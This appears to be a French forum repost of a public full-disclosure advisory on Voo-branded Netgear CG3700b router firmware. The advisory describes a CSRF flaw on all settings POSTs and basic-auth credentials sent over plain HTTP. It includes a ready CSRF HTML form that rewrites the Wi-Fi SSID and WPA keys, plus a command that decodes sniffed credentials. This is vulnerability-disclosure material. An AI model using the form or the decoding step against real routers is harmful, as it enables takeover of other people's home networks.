Bonjour à tous,
L'auteur du CVE à besoin de capture d'écran. Si quelqu'un est dévoué...
Cross-Site Request Forgery (CSRF) on all form POSTs
---------------------------------------------------------------------------------
The Voo branded Netgear CG3700b custom firmware (newest version, V2.02.03)
allows a (context-dependent) attacker to perform a Cross-Site Request
Forgery (CSRF) attack on all configuration setting
(/goform/<settingspage>) page POST requests. By tricking a user into
following a specially crafted link, an attacker can modify all settings
including WEP/WPA/WPA2 keys, restore the router to factory settings, or
even upload an entire malicious configuration file.
Example:
<form method="POST" name="form0" action="http://192.168.0.1/goform/index";
<input type="hidden" name="group_parametrage_wifi" value="active">
<input type="hidden" name="reseau_wifi_name" value="NEWSSID">
<input type="hidden" name="nom_select" value="AUTO-PSK">
<input type="hidden" name="canal" value=0>
<input type="hidden" name="mot_de_passe" value="NEWWPAKEY">
<input type="hidden" name="NBandwidth" value=20>
<input type="hidden" name="group_parametrage_wifi_an" value="active">
<input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G">
<input type="hidden" name="nom_select_an" value="AUTO-PSK">
<input type="hidden" name="canal_an" value=0>
<input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G">
<input type="hidden" name="NBandwidth_an" value=20>
<input type="hidden" name="group_fon" value="desactiver">
<input type="hidden" name="buttonApply" value=1>
<input type="hidden" name="only_mode" value=0>
<input type="hidden" name="selected_ch_an" value=1>
</form>
Insufficient Authentication (OWASP-A2)
-----------------------------------------------------------
This same modem handles authentication via basic authentication over the
default (HTTP, non-ssl) connection. This allows an attacker to easily
decode the base64 encoded username and password, and authenticate to the
router. This only requires an attacker be on the same network as the
router, and sniff the clear-text traffic.
Example:
POST
http://192.168.0.1/goform/parametre_config HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length: 24721
Cache-Control: max-age=0
Authorization: Basic dm9vOlBBU1NXT1JE
root@kali:~# cat voo.txt
dm9vOlBBU1NXT1JE
root@kali:~# base64 --decode voo.txt
voo:PASSWORD
SOURCE:
http://seclists.org/fulldisclosure/2016/Apr/87